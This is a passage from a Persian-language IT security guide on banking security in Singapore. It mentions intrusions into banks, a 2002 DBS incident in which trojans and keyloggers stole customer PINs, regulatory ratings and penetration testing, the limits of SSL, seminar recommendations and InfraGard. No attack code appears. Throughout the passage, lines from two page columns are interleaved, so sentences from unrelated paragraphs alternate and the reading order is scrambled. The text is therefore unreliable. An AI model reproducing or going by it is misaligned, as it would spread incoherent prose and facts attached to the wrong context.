‫ﻣﺎﻧﺪ‪ ،‬ﺍﻣﺎ ﻣﻌﻠﻮﻡ ﺷﺪﻛﻪ ﻧﻔﻮﺫﮔﺮﻫﺎﻳﻲ ﺍﺯ ﺍﺭﻭﭘﺎﻱ ﺷﺮﻗﻲ ﺑﻪ ﺳﻴﺴﺘﻢ‬
‫ﺭﺍﻫﺒﺮﺩﻫﺎ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﺑﺎﻧﻜﻲ ﺣﻤﻠﻪ ﻛﺮﺩﻩ ﺑﻮﺩﻧﺪ‪ .‬ﺩﺍﺩﻩﻫﺎﻱ ﺑﺎﻧـﻚ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ‬
‫ﺍﻳﺠﺎﺩ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﻣﺴﺘﺤﻜﻢ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﻩ‬ ‫‪.۱‬‬ ‫ﮔﺮﻓﺖ ﻭ ﺳﻴﺴﺘﻢ ﺑﺎﻧﻜﻲ ﺟﻬـﺖ ﺑـﻪﺭﻭﺯﺁﻭﺭﻱ ﺣـﺴﺎﺏ ﻣـﺸﺘﺮﻳﺎﻥ‬
‫ﺗﻘﻮﻳﺖ ﻗﺎﺑﻠﻴﺖ ﺩﺳﺘﺮﺳﻲ‪ ،‬ﺍﻣﻨﻴﺖ‪ ،‬ﻭ ﻗﺎﺑﻠﻴﺖ ﺑﺎﺯﻳﺎﺑﻲ‬ ‫‪.۲‬‬ ‫ﺩﺳﺘﻜﺎﺭﻱ ﺷﺪ‪ .‬ﻧﻪﺗﻨﻬﺎ ﭼﻨﺪ ﻣﺎﻩ ﻃﻮﻝ ﻛﺸﻴﺪ ﺗﺎ ﻣﺘﺨﺼﺼﻴﻦ ﺍﺻﻞ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻗﻮﻱ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ‬ ‫‪.۳‬‬ ‫ﻣﺸﻜﻞ ﺭﺍ ﺑﻴﺎﺑﻨﺪ‪ ،‬ﺑﻠﻜﻪ ﺗﻼﺵ ﺯﻳﺎﺩ ﻭ ﻫﺰﻳﻨﺔ ﮔﺰﺍﻓﻲ ﺻﺮﻑ ﺷﺪ ﺗﺎ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﻓﻨﺎﻭﺭﻱ‪ ،‬ﺍﺩﺍﺭﺓ ﺍﻣﻮﺭ ﭘـﻮﻟﻲ‬ ‫ﻛﺸﻒ ﺷﻮﺩ ﻛﻪ ﭼﻪ ﻛـﺴﺎﻧﻲ ﻭ ﻳـﺎ ﭼـﻪ ﭼﻴﺰﻫـﺎﻳﻲ ﻋﻮﺍﻣـﻞ ﺍﻳـﻦ‬
‫ﺳﻨﮕﺎﭘﻮﺭ ﺑﺎﻧﻜﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﺑﻪ ﺍﻧﺠﺎﻡ ﺣﺪﺍﻗﻞ ﺳـﺎﻟﻲ ﻳﻜﺒـﺎﺭ ﺁﺯﻣـﻮﻥ‬ ‫ﻣﺸﻜﻞ ﺑﻮﺩﻩﺍﻧﺪ‪.‬‬
‫ﻧﻔﻮﺫ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺤﻴﻂ ﻛـﺎﺭ ﻧﻤـﻮﺩ‪ .‬ﺍﻳـﻦ ﺍﺩﺍﺭﻩ ﺩﺍﺭﺍﻱ ﻳـﻚ ﺗـﻴﻢ‬ ‫ﺩﺭ ﺳﺎﻝ ‪ ،۲۰۰۲‬ﺣﻤﻠﺔ ﺩﻳﮕﺮﻱ ﺑﻪ ﺩﻭﻣﻴﻦ ﺑﺎﻧﻚ ﺑﺰﺭﮒ ﺳـﻨﮕﺎﭘﻮﺭ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ﻭ ﻳﻚ ﺳﻴـﺴﺘﻢ ﺑـﺮﺍﻱ ﺩﺭﺟـﻪﺑﻨـﺪﻱ‬ ‫)‪ (DBS‬ﺻــﻮﺭﺕ ﮔﺮﻓــﺖ‪ .‬ﺩﺭ ﺍﻳــﻦ ﺭﻭﻳــﺪﺍﺩ ﻧﻔــﻮﺫﮔﺮﺍﻥ ﺑــﺪﻟﻴﻞ‬
‫ﺑﺎﻧﻜﻬﺎ ﺩﺭ ﺳﻴﺴﺘﻢ ﺍﻗﺘﺼﺎﺩﻱ ﺳﻨﮕﺎﭘﻮﺭ ﺍﺳﺖ؛ ﻛﻪ ﺑﺮ ﻣﺒﻨﺎﻱ ﺷـﺶ‬ ‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﺍﻛﻲ ﺷـﺒﻜﻪ ﻭ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻧﺎﻣﻨﺎﺳـﺐ ﺳﻴـﺴﺘﻤﻬﺎ‬
‫ﻣﻌﻴﺎﺭ ﻛﻪ ﺗﻮﺳﻂ ﺍﺩﺍﺭﺓ ﺍﻣﻮﺭ ﭘﻮﻟﻲ ﺳـﻨﮕﺎﭘﻮﺭ ﺗﻌﻴـﻴﻦ ﺷـﺪﻩ ﺍﻧﺠـﺎﻡ‬ ‫ﺗﻮﺍﻧﺴﺘﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺭﺍ ﻫﺪﻑ ﻗﺮﺍﺭ ﺩﻫﻨـﺪ‪ .‬ﻧﻔـﻮﺫﮔﺮﺍﻥ‬
‫ﻣﻲﮔﻴﺮﺩ‪ .‬ﺍﻳﻦ ﻣﻌﻴﺎﺭﻫﺎ‪ ،‬ﻣﺆﺳﺴﺎﺕ ﺭﺍ ﺍﺯ ﻟﺤﺎﻅ ﻣﻴـﺰﺍﻥ ﺍﻳﻤﻨـﻲ ﺑـﻪ‬ ‫ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﻭ ﺛﺒﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺭﺍ ﺩﺭ ﺣﺴﺎﺑﻬﺎﻱ ‪۲۱‬‬
‫ﭘﻨﺞ ﺩﺳﺘﻪ ﺗﻘﺴﻴﻢ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺷـﻤﺎﺭﺓ ‪ ۱‬ﻧـﺸﺎﻧﮕﺮ ﺍﻣـﻦﺗـﺮﻳﻦ ﻭ‬ ‫ﻣﺸﺘﺮﻱ ﺑﺎﻧﻚ ﺗﻌﺒﻴﻪ ﻛﺮﺩﻧﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﺍﺩ ﺗـﺎ ﺷـﻤﺎﺭﺓ‬
‫ﺷﻤﺎﺭﺓ ‪ ۵‬ﻧﺸﺎﻧﮕﺮ ﻧﺎﺍﻣﻦﺗﺮﻳﻦ ﺁﻧﻬﺎ ﺍﺳﺖ‪ .‬ﺑﺎﻧﻜﻬﺎ ﻣﻠﺰﻡ ﻫﺴﺘﻨﺪ ﻛـﻪ‬ ‫ﺷﻨﺎﺳﺎﻳﻲ ﻓﺮﺩﻱ )‪ (PIN‬ﻭ ﺷﻤﺎﺭﺓ ﺷﻨﺎﺳﺎﻳﻲ ﻛـﺎﺭﺑﺮﻱ ﺭﺍ ﺑﺪﺳـﺖ‬
‫ﺩﺭ ﺍﻳﻦ ﺍﺭﺯﻳﺎﺑﻲ ﺣﺪﺍﻗﻞ ﺑﻪ ﺩﺭﺟﺔ ‪ ۲‬ﺩﺳﺖ ﻳﺎﺑﻨﺪ‪ ،‬ﻭ ﻋﻼﻭﻩ ﺑـﺮ ﺁﻥ‬ ‫ﺁﻭﺭﻧــﺪ‪ .‬ﺍﻳــﻦ ﺣﺎﺩﺛــﻪ ﺳــﺒﺐ ﺷــﺪ ‪ ۶۲,۰۰۰‬ﺩﻻﺭ ﺑــﻪ ﺣــﺴﺎﺑﻬﺎﻱ‬
‫ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﻃﺮﺡ ﺑﺎﺯﻳﺎﺑﻲ ﻭ ﺗﺮﻣﻴﻢ ﺳﺮﻳﻊ ﻧﻴﺰ ﺩﺍﺷـﺘﻪ‬ ‫ﻣﺸﺘﺮﻳﺎﻥ ﺿﺮﺭ ﻭﺍﺭﺩ ﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﻧﻜﺘﺔ ﻗﺎﺑـﻞ ﺗﻮﺟـﻪ ﺁﻥ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺑﺎﺷﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﺓ ﭘﻴﺸﺮﻓﺖ ﺩﺭ ﺍﻣﻨﻴـﺖ ﺑﺎﻧﻜﻬـﺎ ﻭ ﺍﻟﻘـﺎﻱ‬ ‫ﺗﺄﺛﻴﺮ ﻣﻨﻔﻲ ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﺩﺭ ﺍﻓﻜﺎﺭ ﻋﻤﻮﻣﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ﺍﻳﻦ ﺑﻮﺩ؛‬
‫ﺣﺲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﺳﺎﺯﻱ‪ ،‬ﻧﺘﺎﻳﺞ ﺍﻳﻦ ﺩﺭﺟﻪﺑﻨﺪﻱ ﺑـﺼﻮﺭﺕ ﻋﻤـﻮﻣﻲ‬ ‫ﭼﺮﺍﻛﻪ ﺭﻭﺯﻧﺎﻣﻪﻫﺎﻱ ﻛﺸﻮﺭ ﺑﻪ ﻣـﺪﺕ ﻳﻜﻤـﺎﻩ ﺩﺭ ﺍﻳـﻦ ﺧـﺼﻮﺹ‬
‫ﻣﻨﺘﺸﺮ ﻣﻲ ﺷﻮﺩ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺑﺎﻧﻜﻬﺎ ﻣﻠﺰﻡ ﺑﻪ ﮔﺰﺍﺭﺵ ﻫﺮﮔﻮﻧـﻪ‬ ‫ﻣﻄﻠﺐ ﻧﻮﺷـﺘﻨﺪ‪ .‬ﺍﻣﺜـﺎﻝ ﺍﻳـﻦ ﺭﺧـﺪﺍﺩﻫﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﺑﺤـﺮﺍﻥ‬
‫ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬ ‫ﺑﻲﺍﻋﺘﻤﺎﺩﻱ ﻣﺮﺩﻡ ﺑﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻣﻨﺠـﺮ‬
‫ﺑـــﺎ ﺍﻓـــﺰﺍﻳﺶ ﺍﺳـــﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳـــﺘﮕﺎﻫﻬﺎﻱ ﺳـــﻴﺎﺭ ﭘﺮﺩﺍﺧـــﺖ‪،‬‬ ‫ﺷﻮﻧﺪ‪.‬‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳـﻴﻢ ﻧﻴـﺰ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﺗﻮﺟـﻪ ﻗـﺮﺍﺭ‬ ‫ﻳﻚ ﻧﻘﻄﻪﺿﻌﻒ ﺍﺳﺎﺳﻲ ﻛﻪ ﺩﺭ ﺗﻤﺎﻡ ﺍﻳﻦ ﺭﺧﺪﺍﺩﻫﺎ ﺗﺄﺛﻴﺮ ﺩﺍﺷـﺖ‬
‫ﮔﻴﺮﻧﺪ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺗﺠﺮﺑﻴﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺑـﻲﺳـﻴﻢ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺗﻚﻋﺎﻣﻠﻲ ﺑﻮﺩ‪ .‬ﻫﻢﺍﻛﻨﻮﻥ ﻧﻴﺰ ﺑﻴـﺸﺘﺮ‬
‫ﺳﻨﮕﺎﭘﻮﺭ ﻫﻤﭽﻨﺎﻥ ﺗﺤﺖ ﺑﺮﺭﺳﻲ ﻫﺴﺘﻨﺪ‪.‬‬ ‫ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﺑﺴﻴﺎﺭ ﺍﻭﻟﻴﺔ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﺗﻨﻬﺎ ﻳﻚ ﻳﺎ ﺩﻭ ﺣﺎﺩﺛﺔ ﺩﻫﺸﺘﻨﺎﻙ ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﺟﻤﻊﺑﻨﺪﻱ ﺳﺆﺍﻻﺕ ﻭ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ‬ ‫ﺑﺎﻧﻜﻬﺎ ﺭﺍ ﺑﻪ ﺗﺠﺪﻳﺪ ﻧﻈﺮ ﺩﺭ ﺍﻳﻦ ﺭﻭﻧﺪ ﻭﺍﺩﺍﺭ ﻛﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻧﻮﻋﻲ‬
‫ﺗﻮﺻﻴﻪﻫﺎ ﻭ ﭘﺮﺳﺸﻬﺎﻱ ﭘﺎﻳﺎﻧﻲ ﺷﺎﻣﻞ ﻧﻘﺎﻁ ﻛﻠﻴﺪﻱ ﺍﻳـﻦ ﺳـﻤﻴﻨﺎﺭ‬ ‫ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺶ ﺍﺯ ﺣﺪ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ‪ SSL‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ؛ ﺍﻣﺎ‬
‫ﺟﻬﺎﻧﻲ ﺑﻮﺩ‪.‬‬ ‫ﺍﻣﻨﻴﺘﻲ ﻛﻪ ‪ SSL‬ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ ﺑﺴﻴﺎﺭ ﻣﺤـﺪﻭﺩ ﺍﺳـﺖ‪ ،‬ﭼﺮﺍﻛـﻪ‬
‫ﺗﻨﻬﺎ ﺩﺭ ﺧﻼﻝ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﺁﻧﻬﺎ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﻧﻪ ﺩﺭ‬
‫ﻲ ﻧﻴﺎﺯﻫﺎﻱ ﺣـﺎﻝ‬
‫ﺍﻭﻝ‪ ،‬ﺍﻃﻼﻉ ﺭﺳﺎﻧﻲ ﻭ ﺁﮔﺎﻫﻲ ﺩﺭ ﺁﻣﻮﺯﺵ ﻋﻤﻮﻣ ﹺ‬
‫ﻣﺒﺪﺃ ﻳﺎ ﻣﻘﺼﺪ‪ .‬ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ﻭ ﺩﻳﮕﺮ ﺭﺳﺎﻧﻪﻫﺎﻱ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ‬
‫ﺣﺎﺿﺮ ﺍﻣﻨﻴﺘﻲ ﻧﻘﺸﻲ ﺣﻴﺎﺗﻲ ﺍﻳﻔﺎ ﻣﻲﻛﻨـﺪ‪ .‬ﻗـﻮﺍﻧﻴﻦ ﺩﻭﻟﺘـﻲ ﻣﺜـﻞ‬
‫ﺑﺎﻳﺪ ﻫﻤﻴﺸﻪ ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺑﺎﺷـﻨﺪ ﺗـﺎ ﺍﻣﻨﻴـﺖ ﺁﻧﻬـﺎ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٢٨‬‬

‫ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻟﻲ ﺍﺯ ﻧﺤﻮﺓ ﺍﻳﺠﺎﺩ ﺍﺭﺗﺒﺎﻁ‬ ‫"ﺍﻟﺰﺍﻡ ﮔﺰﺍﺭﺵ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺸﻜﻮﻙ" ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺗﻲ ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ‬
‫ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﺩ‪.‬‬ ‫ﻛﻪ ﺑﻪ ﻣﺮﺣﻠﺔ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﻨﺪ‪.‬‬
‫ﭼﻬﺎﺭﻡ‪ ،‬ﺑﺮﺍﻱ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﻧﻮﻋﻲ ﺗﻌﻬﺪ ﺩﺭ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪،‬‬ ‫ﺩﻭﻡ‪ ،‬ﺷﻔﺎﻓﻴﺖ ﻭ ﺍﻧﺘﺸﺎﺭ ﺍﻃﻼﻋﺎﺕ ﺭﺧﺪﺍﺩﻫﺎ ﺑﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ ﺳـﻄﺢ‬
‫ﻧﻘــﺸﻬﺎ ﻭ ﻣــﺴﺌﻮﻟﻴﺘﻬﺎ ﺑﺎﻳــﺪ ﺗﻌﻴــﻴﻦ ﺷــﻮﻧﺪ؛ ﻭ ﻟــﺬﺍ ﺗــﺪﻭﻳﻦ ﻳــﻚ‬ ‫ﺍﻳﻤﻨﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﻳﻨﺪﻩ ﺍﻫﻤﻴـﺖ ﺯﻳـﺎﺩﻱ ﺩﺍﺭﺩ‪ .‬ﺑـﻪ ﺍﻳـﻦ ﻧﻜﺘـﻪ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﺮﺍﻗﺒﺖ ﻭ ﺍﻧﺠﺎﻡ ﻭﻇﺎﻳﻒ ﺍﻣﺎﻧﺘﺪﺍﺭﻱ ﺑﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬ ‫ﺍﺷﺎﺭﻩ ﺷﺪ ﻛﻪ ﮔﺎﻫﻲ ﭘﻮﺷﺶ ﺧﺒﺮﻱ ﻭﻗﺎﻳﻊ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻀﺮ ﺑﺎﺷـﺪ‪،‬‬
‫ﺍﻗﺘﺼﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﻜﻲ ﺍﺯ ﻣﺴﺎﺋﻞ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳـﺖ‪ .‬ﻋﻨـﺎﻭﻳﻦ‬ ‫ﭼﺮﺍﻛﻪ ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭ ﻫﺮﺻﻮﺭﺕ ﺍﺯ ﻣﻄﺒﻮﻋﺎﺕ ﺗـﺄﺛﻴﺮ ﻣـﻲﭘﺬﻳﺮﻧـﺪ‪.‬‬
‫ﻣﺒﺎﺣﺚ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺳﭙﺮﺩﻩﻫـﺎ ﻭ ﺗﺮﺍﻛﻨـﺸﻬﺎ‪ ،‬ﺍﻋﺘﻤـﺎﺩ‬ ‫ﺩﺭﻋــﻮﺽ ﺷــﺮﻛﺘﻬﺎ ﺑﺎﻳــﺪ ﻭﺿــﻌﻴﺖ ﺭﺍ ﺑــﺴﺮﻋﺖ ﺍﺻــﻼﺡ ﻛﻨﻨــﺪ‪.‬‬
‫ﻋﻤﻮﻣﻲ‪ ،‬ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ‪.‬‬ ‫ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﻣﺸﻜﻞ ﺑﺎ ﺍﻳﺠﺎﺩ ﻳﻚ ﻃـﺮﺡ ﻋﻤﻠﻴـﺎﺗﻲ‪ ،‬ﺭﺍﻩ ﺑﻬﺘـﺮﻱ‬
‫ﺳﺮﺍﻧﺠﺎﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻳﻜﻲ ﺍﺯ ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ‬ ‫ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻳﻚ ﻧﻔﻮﺫ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ‪ .‬ﺳﺆﺍﻝ ﻋﻤـﺪﻩﺍﻱ ﻛـﻪ ﺩﺭ‬
‫ﻣﻬﻢ ﺷﺮﻛﺖﻛﻨﻨﺪﮔﺎﻥ ﺑﻮﺩ‪ .‬ﻧﻤﻮﻧﻪﺍﻱ ﺍﺯ ﻣﺸﻜﻼﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳﻦ‬ ‫ﺍﻳﻨﺠﺎ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﭼﻪ ﺣﺪﻱ ﻭ ﺩﺭ ﭼﻪ ﺯﻣـﺎﻧﻲ‬
‫ﺯﻣﻴﻨﻪ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﺭﺥ ﺩﺍﺩ؛ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﺷـﺮﻛﺖ ﺧـﺪﻣﺎﺕ‬ ‫ﺑﺎﻳﺪ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﺮﺩ‪ .‬ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺩﻳﮕﺮ ﺍﻳﻦ ﻛﺘﺎﺏ‬
‫ﻣﻴﺰﺑــﺎﻧﻲ ﻭﺏ ﺩﺭ ﺍﻳــﺎﻻﺕ ﻣﺘﺤــﺪﻩ ﻣــﻮﺭﺩ ﻧﻔــﻮﺫ ﻗــﺮﺍﺭ ﮔﺮﻓــﺖ ﻭ‬ ‫ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺩﺭﻧﺘﻴﺠﻪ ﺍﻣﻨﻴﺖ ﺑﻴﺶ ﺍﺯ ‪ ۳۰۰‬ﺑﺎﻧـﻚ ﺧﺪﺷـﻪﺩﺍﺭ ﺷـﺪ‪ .‬ﺟﺰﺋﻴـﺎﺕ‬ ‫ﺳﻮﻡ‪ ،‬ﺑﻴﺸﺘﺮ ﻛﺸﻮﺭﻫﺎﻱ ﺷـﺮﻛﺖﻛﻨﻨـﺪﻩ ﺑـﻪ ﻟـﺰﻭﻡ ﻫﻤﻜﺎﺭﻳﻬـﺎﻱ‬
‫ﺑﻴﺸﺘﺮ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ‬ ‫ﻓﺮﺍﺑﺨﺸﻲ ﺗﺄﻛﻴﺪ ﺩﺍﺷﺘﻨﺪ‪ .‬ﻳﻜﻲ ﺍﺯ ﺑﺨﺸﻬﺎﻳﻲ ﻛﻪ ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﺁﻥ‬
‫ﺑﺨﺸﻬﺎﻱ ﺩﻳﮕﺮ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﻭ ﺳـﺎﻳﺮ ﻣﻨـﺎﺑﻌﻲ ﻛـﻪ ﺩﺭ ﻗـﺴﻤﺖ‬ ‫ﻣﺜﻤﺮ ﺛﻤﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻫـﺴﺘﻨﺪ‪ .‬ﺩﺭ‬
‫ﺿﻤﺎﺋﻢ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷﺪﻩ ﭘﻴﺪﺍ ﻛﺮﺩ‪.‬‬ ‫ﺍﻳﻦ ﻗﺴﻤﺖ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺑﺎ ﺟﺎﻣﻌﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻫﻤﻜﺎﺭﻱ ﻧﻤﺎﻳﻨـﺪ‬
‫ﺗﺎ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻫﺮ ﺑﺨﺶ ﻣﺸﺨﺺ ﺷـﻮﺩ‪ ،EBG .‬ﻳﻜـﻲ ﺍﺯ‬
‫ﺩﺭ ﺧﺎﺗﻤــﻪ ﺧﺎﻃﺮﻧــﺸﺎﻥ ﻣــﻲﻛﻨــﻴﻢ ﻛــﻪ ﺑــﺮﺍﻱ ﻗﺎﻧﻮﻧﮕــﺬﺍﺭﺍﻥ ﻭ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﻭ ﻧﻴﺰ ‪ InfraGard‬ﻛﻪ ﻳﻚ‬
‫ﺑﺎﺯﺭﺳﺎﻥ‪ ،‬ﺍﺭﺯﻳﺎﺑﻲ ﻣﺠﺪﺩ ﭼﺘﺮ ﺗﻘﻨﻴﻨﻲ )ﺧﺼﻮﺻﹰﺎ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻧﺘﻘﺎﻝ ﭘـﻮﻝ‬
‫ﺷﺒﻜﺔ ﺧﺼﻮﺻﻲ‪ -‬ﻋﻤﻮﻣﻲ ﻣﺘﻌﻠﻖ ﺑـﻪ ‪ FBI‬ﺍﺳـﺖ ﺩﻭ ﻧﻤﻮﻧـﻪ ﺍﺯ‬
‫ﺗﻮﺳﻂ ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ‪ ،‬ﻣﺜﻞ ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻧﻲ ﻭﺏ( ﺍﻣﺮﻱ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ‬
‫ﺍﻳﻦ ﻗﺒﻴﻞ ﻣﺆﺳﺴﺎﺕ ﻫﺴﺘﻨﺪ‪ InfraGard .‬ﺗﻤﺎﻣﻲ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ‬
‫ﺍﺳﺖ‪.‬‬
‫ﺣﻴﺎﺗﻲ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﺩ ﻭ ﺣﺪﻭﺩ ‪ ۱۰,۰۰۰‬ﻋﻀﻮ ﺩﺍﺭﺩ‪ .‬ﻫﺪﻑ ﺍﻳﻦ‬
‫ﺳﺎﺯﻣﺎﻥ ﺍﻳﺠﺎﺩ ﺍﻋﺘﻤﺎﺩ ﻭ ﺗﺸﻮﻳﻖ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺍﻋـﻀﺎ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬

‫ﻓﺼﻞ ‪ .۱‬ﻣﻘﺪﻣﻪ‬
